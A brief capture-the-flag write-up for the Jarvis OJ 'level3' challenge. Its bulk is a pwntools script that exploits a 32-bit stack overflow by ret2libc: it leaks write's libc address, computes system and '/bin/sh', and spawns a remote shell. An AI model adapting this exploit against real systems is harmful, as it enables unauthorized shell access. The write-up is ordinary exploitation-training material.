[XMAN]level3
nc pwn2.jarvisoj.com 9879
Hint1: 本题附件已更新,请大家重新下载以免影响解题。
level3.rar.f795bbaa1e4a3f9d467317d6df936c6b
32位栈溢出,ret2libc
exp如下:
from pwn import * #io = process('./level3') #io = gdb.debug('./level3') io = remote('pwn2.jarvisoj.com', 9879) elf = ELF('./level3') #libc = elf.libc libc = ELF('./libc-2.19.so') io.recvuntil('Input:\n') payload = b'a' * 140 + p32(0x8048340) + p32(0x804844B) + p32(1) + p32(0x804A018) + p32(4) io.send(payload) write_addr = u32(io.recv(4)) info("write_addr:" + str(hex(write_addr))) libc_base = write_addr - libc.symbols['write'] info("libc_base:" + str(hex(libc_base))) io.recvuntil('Input:\n') system_addr = libc.symbols['system'] + libc_base info("system_addr:" + str(hex(system_addr))) binsh_addr = next(libc.search(b'/bin/sh')) + libc_base info("binsh_addr:" + str(hex(binsh_addr))) payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(binsh_addr) io.send(payload) io.interactive()